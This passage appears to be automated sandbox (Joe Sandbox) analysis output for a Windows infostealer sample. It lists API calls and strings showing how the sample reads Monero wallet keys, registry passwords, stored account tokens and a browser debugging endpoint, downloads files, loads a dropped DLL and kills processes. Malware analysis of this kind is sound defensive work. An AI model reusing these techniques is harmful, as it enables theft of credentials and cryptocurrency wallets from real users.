                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 34af2fdd64ebc732bada19e51d53cbbd07806cde13925e22ffd4e3ec5c437be8
                                        • Instruction ID: d93adf5db5cb1a930c9c5bb003809ecb75c78927948a0f02e8a7e6e9d23919c0
                                        • Opcode Fuzzy Hash: 34af2fdd64ebc732bada19e51d53cbbd07806cde13925e22ffd4e3ec5c437be8
                                        • Instruction Fuzzy Hash: 1D5104719501185BCB15FB60DD92AED737DAF64700F8045E8B60A62092EF706B89CFA5
                                        APIs
                                        • InternetOpenA.WININET(001A0AF6,00000001,00000000,00000000,00000000), ref: 00189A6A
                                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00189AAB
                                        • InternetCloseHandle.WININET(00000000), ref: 00189AC7
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Open$CloseHandle
                                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                        • API String ID: 3289985339-2144369209
                                        • Opcode ID: 00622f0b92700ecdda8aaa1bcc771515ce5de1da5ab5a05856d3ff7d8ecbfbc7
                                        • Instruction ID: 5a10ae2449b458b2e8690a1c143af0ccc966ada8698b76da902be5a9005e6fb5
                                        • Opcode Fuzzy Hash: 00622f0b92700ecdda8aaa1bcc771515ce5de1da5ab5a05856d3ff7d8ecbfbc7
                                        • Instruction Fuzzy Hash: 17411A35A10258AFCB14EFA4DC95FED77B8BB58740F104099F509AB190CBB0AE80CF64
                                        APIs
                                          • Part of subcall function 00187330: memset.MSVCRT ref: 00187374
                                          • Part of subcall function 00187330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0018739A
                                          • Part of subcall function 00187330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00187411
                                          • Part of subcall function 00187330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0018746D
                                          • Part of subcall function 00187330: GetProcessHeap.KERNEL32(00000000,?), ref: 001874B2
                                          • Part of subcall function 00187330: HeapFree.KERNEL32(00000000), ref: 001874B9
                                        • lstrcat.KERNEL32(00000000,001A192C), ref: 00187666
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 001876A8
                                        • lstrcat.KERNEL32(00000000, : ), ref: 001876BA
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 001876EF
                                        • lstrcat.KERNEL32(00000000,001A1934), ref: 00187700
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00187733
                                        • lstrcat.KERNEL32(00000000,001A1938), ref: 0018774D
                                        • task.LIBCPMTD ref: 0018775B
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                        • String ID: :
                                        • API String ID: 3191641157-3653984579
                                        • Opcode ID: 90062d7abe7ac2defd710444534cd429af9248c4c5c3ed6c0c79e8af3f831e58
                                        • Instruction ID: 945855f839359e2109359db608d5d0a9d1a6ef19fc0c655c19a47cce83393d65
                                        • Opcode Fuzzy Hash: 90062d7abe7ac2defd710444534cd429af9248c4c5c3ed6c0c79e8af3f831e58
                                        • Instruction Fuzzy Hash: 9A314D75904208EFDB04EBA0EC99DEF73B9AB54702F604128F102632A2DF34EA45CF94
                                        APIs
                                        • memset.MSVCRT ref: 00187374
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0018739A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00187411
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0018746D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 001874B2
                                        • HeapFree.KERNEL32(00000000), ref: 001874B9
                                        • task.LIBCPMTD ref: 001875B5
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                        • String ID: Password
                                        • API String ID: 2808661185-3434357891
                                        • Opcode ID: 56a3766749b2961755f463f8e3907b53570470504a029fb487b3b10b92465051
                                        • Instruction ID: ce916ac5eba92ecc86f4171a778f127be3249c718a1f33edfafb868ba97877b7
                                        • Opcode Fuzzy Hash: 56a3766749b2961755f463f8e3907b53570470504a029fb487b3b10b92465051
                                        • Instruction Fuzzy Hash: D5612EB59042589BDB24EB50DC45BDAB7B8BF54300F5081E9E649A6181DF709BC9CF90
                                        APIs
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                        • wsprintfA.USER32 ref: 00189E7F
                                        • memset.MSVCRT ref: 00189EED
                                        • lstrcat.KERNEL32(00000000,?), ref: 00189F03
                                        • lstrcat.KERNEL32(00000000,?), ref: 00189F17
                                        • lstrcat.KERNEL32(00000000,001A12D8), ref: 00189F29
                                        • lstrcpy.KERNEL32(?,00000000), ref: 00189F7C
                                        • memset.MSVCRT ref: 00189F9C
                                        • Sleep.KERNEL32(00001388), ref: 0018A013
                                          • Part of subcall function 001999A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001999C5
                                          • Part of subcall function 001999A0: Process32First.KERNEL32(0018A056,00000128), ref: 001999D9
                                          • Part of subcall function 001999A0: Process32Next.KERNEL32(0018A056,00000128), ref: 001999F2
                                          • Part of subcall function 001999A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00199A4E
                                          • Part of subcall function 001999A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00199A6C
                                          • Part of subcall function 001999A0: CloseHandle.KERNEL32(00000000), ref: 00199A79
                                          • Part of subcall function 001999A0: CloseHandle.KERNEL32(0018A056), ref: 00199A88
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                        • String ID: D
                                        • API String ID: 3242155833-2746444292
                                        • Opcode ID: 96d4916bccd36bdb4a9dc2c2c6b59929bc59767fee0a35f21c8701a1507ee9f0
                                        • Instruction ID: 2e58271f52ecb80d18f89d35b9b629b3d02aae06aa7f584412d44134071f04b1
                                        • Opcode Fuzzy Hash: 96d4916bccd36bdb4a9dc2c2c6b59929bc59767fee0a35f21c8701a1507ee9f0
                                        • Instruction Fuzzy Hash: 7D5188B1944318ABEB20EB60DC4AFDE7378AF54700F004598F60DA7281EB75AB88CF55
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                          • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                        • InternetOpenA.WININET(001A0DFB,00000001,00000000,00000000,00000000), ref: 0018615F
                                        • StrCmpCA.SHLWAPI(?,011CE938), ref: 00186197
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001861DF
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00186203
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 0018622C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0018625A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00186299
                                        • InternetCloseHandle.WININET(?), ref: 001862A3
                                        • InternetCloseHandle.WININET(00000000), ref: 001862B0
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 466b40b5338549acbbaadd5f0e1602cc0e1ba888426aade90c65fb68cd1f1a08
                                        • Instruction ID: 8142d1d28414f3b12e48dc0e048f3c4e7ad972e810485221ec9a796c1ccc2657
                                        • Opcode Fuzzy Hash: 466b40b5338549acbbaadd5f0e1602cc0e1ba888426aade90c65fb68cd1f1a08
                                        • Instruction Fuzzy Hash: A35142B1A00218ABDF24EFA0DC45BEE7779AF44301F5085A8F605A71C1DB74AB89CF95
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 0020024D
                                        • ___TypeMatch.LIBVCRUNTIME ref: 0020035B
                                        • CatchIt.LIBVCRUNTIME ref: 002003AC
                                        • CallUnexpected.LIBVCRUNTIME ref: 002004C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 2356445960-393685449
                                        • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction ID: a29b41aead1339f8164d86a37ebf2e55ca8fbba4d248f467551b756bcf2780d7
                                        • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction Fuzzy Hash: A5B1683181030AEFEF15DFA4D8C1AAEBBB5BF14314F10416AE9156B293D370DA61CB91
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                        • lstrlen.KERNEL32(00000000), ref: 0018BC6F
                                          • Part of subcall function 00198FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00198FE2
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0018BC9D
                                        • lstrlen.KERNEL32(00000000), ref: 0018BD75
                                        • lstrlen.KERNEL32(00000000), ref: 0018BD89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 0adebf598ff95b9b07b2f799cfa11561ea26c1ec6f8115336991e040e38549b3
                                        • Instruction ID: 8846ed142b565d20cb52d7c3acdc0e81dfe06dd6ee52c6d8251061c0a22e9234
                                        • Opcode Fuzzy Hash: 0adebf598ff95b9b07b2f799cfa11561ea26c1ec6f8115336991e040e38549b3
                                        • Instruction Fuzzy Hash: 52B1F072914108ABCF14FBA0DD96EEE7379BF64301F804568F50766192EF346A4CCBA6
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: 250e78e0bd15c867cb7380f87ff1ce003a2d165a790cacbb29c6c6e179262f6a
                                        • Instruction ID: 38825ea680982a2fc2ca820c9f07a4b99a1ce9f88575ac9da1d31abcb2ec18f0
                                        • Opcode Fuzzy Hash: 250e78e0bd15c867cb7380f87ff1ce003a2d165a790cacbb29c6c6e179262f6a
                                        • Instruction Fuzzy Hash: EBF0F83194C309EFD744AFE0F90979CBB70EB04707F1141B9F61A96291CA749A909B79
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 00199850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,001908DC,C:\ProgramData\chrome.dll), ref: 00199871
                                          • Part of subcall function 0018A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0018A098
                                        • StrCmpCA.SHLWAPI(00000000,011C9248), ref: 00190922
                                        • StrCmpCA.SHLWAPI(00000000,011C92B8), ref: 00190B79
                                        • StrCmpCA.SHLWAPI(00000000,011C9228), ref: 00190A0C
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                        • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00190C35
                                        Strings
                                        • C:\ProgramData\chrome.dll, xrefs: 00190C30
                                        • C:\ProgramData\chrome.dll, xrefs: 001908CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                        • API String ID: 585553867-663540502
                                        • Opcode ID: 5502556bf34e5e885e8ef4dd9e9bfe8ab00d69111cf39cac849f6e4b53f196ad
                                        • Instruction ID: 0fe21a42d3d7d0a166248f152b27c77417f6bb79e4e5a51cebb059f840cc2e87
                                        • Opcode Fuzzy Hash: 5502556bf34e5e885e8ef4dd9e9bfe8ab00d69111cf39cac849f6e4b53f196ad
                                        • Instruction Fuzzy Hash: 48A114717002089FCF18FF64D996AAD77BAAF95300F50856DE40A9F252DB30DA09CBD6
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 001FFA1F
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 001FFA27
                                        • _ValidateLocalCookies.LIBCMT ref: 001FFAB0
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 001FFADB
                                        • _ValidateLocalCookies.LIBCMT ref: 001FFB30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction ID: 8d2535d833ac8d2689adbd6f5a4575e024391b320c1321b69a088a43be1024bb
                                        • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction Fuzzy Hash: 1F41B43590021DEBCF10DF68C880AAE7BB5FF49314F148169EA19AB392D7719916CF91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018501A
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00185021
                                        • InternetOpenA.WININET(001A0DE3,00000000,00000000,00000000,00000000), ref: 0018503A
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00185061
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00185091
                                        • InternetCloseHandle.WININET(?), ref: 00185109
                                        • InternetCloseHandle.WININET(?), ref: 00185116
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 9a55e9a3635213b5c14e6e53e5b1a4e0203446e3341fca9f37918fe23842eac3
                                        • Instruction ID: 7bfde2d18428e85f56315a63b9bfa1328e3fba1a31c987dcce368aa084e21449
                                        • Opcode Fuzzy Hash: 9a55e9a3635213b5c14e6e53e5b1a4e0203446e3341fca9f37918fe23842eac3
                                        • Instruction Fuzzy Hash: 233118B4A04218ABDB24DF54DC85BDCB7B5EB48305F5081E8FA09A7281CB706EC58F98
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,011CE0F8,00000000,?,001A0E14,00000000,?,00000000), ref: 001982C0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001982C7
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001982E8
                                        • wsprintfA.USER32 ref: 0019833C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2922868504-3474575989
                                        • Opcode ID: 47c7ee2c74af1d550d27108de6deb7fc502df88d9337b37a61ed98a99b5c152d
                                        • Instruction ID: 6bef78c5ff270c1cceff967169ff24973b961a7d70bf246e9dcbbd82f8337843
                                        • Opcode Fuzzy Hash: 47c7ee2c74af1d550d27108de6deb7fc502df88d9337b37a61ed98a99b5c152d
                                        • Instruction Fuzzy Hash: B82108B1E44308ABDB00DFD4DD4AFAEB7B8FB45B15F104519F615BB280DB7899008BA9
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001985B6
                                        • wsprintfA.USER32 ref: 001985E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0019860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0019861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00198629
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                        • RegQueryValueExA.ADVAPI32(00000000,011CE0B0,00000000,000F003F,?,00000400), ref: 0019867C
                                        • lstrlen.KERNEL32(?), ref: 00198691
                                        • RegQueryValueExA.ADVAPI32(00000000,011CDE70,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001A0B3C), ref: 00198729
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00198798
                                        • RegCloseKey.ADVAPI32(00000000), ref: 001987AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 56261e17f7c1e921168c53d7a3f99a0aa56fd3f524c3e10e76ffe8fad0641902
                                        • Instruction ID: 124422d559b5075269abafb8203e42df4a991cb6e4dd6da61c1b8860058e70bf
                                        • Opcode Fuzzy Hash: 56261e17f7c1e921168c53d7a3f99a0aa56fd3f524c3e10e76ffe8fad0641902
                                        • Instruction Fuzzy Hash: 1C211975A10218ABDB24DB54DC85FE9B3B8FB48701F1081E8F609A6181DF71AA85CFE4
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001999C5
                                        • Process32First.KERNEL32(0018A056,00000128), ref: 001999D9
                                        • Process32Next.KERNEL32(0018A056,00000128), ref: 001999F2
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00199A4E
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00199A6C
                                        • CloseHandle.KERNEL32(00000000), ref: 00199A79
                                        • CloseHandle.KERNEL32(0018A056), ref: 00199A88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: 41778b56ac9dc5491ecc7b7af750c87de222c8832101445c05b74b220fee6b38
                                        • Instruction ID: 46c7966579999e68bd0a455feac944622780716a7f4ecb6ee5d0fd7fec1e8fbb
                                        • Opcode Fuzzy Hash: 41778b56ac9dc5491ecc7b7af750c87de222c8832101445c05b74b220fee6b38
                                        • Instruction Fuzzy Hash: 2121E871904218ABDF25DFA5DC89BEDB7B9FB48305F1041E8E50AA7290D7749E84CF90
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197834
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0019783B
                                        • RegOpenKeyExA.ADVAPI32(80000002,011BC390,00000000,00020119,00000000), ref: 0019786D
                                        • RegQueryValueExA.ADVAPI32(00000000,011CDF00,00000000,00000000,?,000000FF), ref: 0019788E
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00197898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 0a3b1c0cecc58412d496e95a6b49050845b556c4ba0a92d122c17eb32d38ddd3
                                        • Instruction ID: 97ecb066cc567d9759a24c4b23ab36f96954ac4047fbc79e6839ef49e778d8b4
                                        • Opcode Fuzzy Hash: 0a3b1c0cecc58412d496e95a6b49050845b556c4ba0a92d122c17eb32d38ddd3
                                        • Instruction Fuzzy Hash: 1401FF79A58305BBEB04DBE4ED4AF6E7778EF48701F1041A4FA09A7291EB70D900CB54
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001978C4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001978CB
                                        • RegOpenKeyExA.ADVAPI32(80000002,011BC390,00000000,00020119,00197849), ref: 001978EB
                                        • RegQueryValueExA.ADVAPI32(00197849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0019790A
                                        • RegCloseKey.ADVAPI32(00197849), ref: 00197914
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
